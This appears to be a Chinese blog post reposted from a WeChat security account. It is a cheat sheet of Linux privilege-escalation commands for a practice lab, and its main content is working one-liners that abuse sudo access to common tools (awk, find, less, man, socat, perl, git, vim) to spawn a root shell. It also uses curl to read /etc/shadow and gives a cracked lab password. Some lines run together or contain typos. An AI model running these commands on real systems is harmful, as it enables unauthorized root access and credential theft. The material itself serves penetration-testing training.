环境配置
这里使用靶场linusec
登录账号密码:
账号:bob 密码:secret这里是普通权限用户
这里假定kali拿到了普通用户权限
kali连接ssh靶机
ssh bob@[目标ip]密码
secretash也是一种shell,占用资源很少的,管理员可能开启
sudo ashawk是一个强大的文本分析工具
sudo awk 'BEGIN {system("/bin/sh")}'使用这个命令可以直接提权到root
bash提权bashsudo bash
csh同样是一种shell
sudo cshcurl 提权
sudo curl file:///etc/shadow
dash 一些小型设备可能安装
sudo dashed 文本编辑器,一次只能编辑一行
sudo ed!/bin/sh
env查询环境变量,可以查询环境变量的时候执行一下bin/sh文件
sodu env /bin/sh
expect自动化交互套件,执行程序的时候可以交互
sudo expect -c 'spawn /bin/sh;interact'
find 指定查找文件
sudo find . -exec /bin/sh ; -quit
ftp
less /etc/passwd读取文件时执行文件sh
!/bin/sh
sudo man man man命令的详细解释 man命令是Linux下的帮助指令,执行两次出现问题后输入下面的代码读取使用bin/sh
! /bin/sh
socat 也是一个多功能网络工具
sudo socat stdin exec:/bin/sh
ssh命令
sudo ssh -o ProxyCommand=' :sh 0<&2 1>&2' x
visudo vi -c ':!/bin/sh' /dev/null
zsh也属于shell中的一种,有一些Linux中会使用
sudo zsh
pico用来编辑文本文件的
sudo pico^R^Xreset; sh 1>&0 2>&0
rvim 改进版的vi
使用rvim加上python3执行命令
sudo rvim -c ':python3 import os; os.execl("/bin/sh","sh","-c","reset; exec sh")'perl 环境
sudo perl -e 'exec "/bin/sh";'
tclsh 脚本语言
sudo tclshexec /bin/sh <@stdin > @stdout 2>@stderr
git 提权 开源封闭的程序管理系统
sudo git -p help config! /bin/sh
scriptsudo script -q /dev/null
taskset 设置线程的命令,可以把命令绑定到特定的cpu运行
sudo taskset 1 /bin/sh -p密码破解
cat /etc/passwdinsecurity 密码P@ssw0rdsu insecurity切换到这个用户权限
关注公众号回复:
Linux提权靶场获得靶场,靶场直接打开选择用vm虚拟机打开
扫描二维码关注我们吧!
原文始发于微信公众号(白安全组):Linux下提权(基于靶场)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论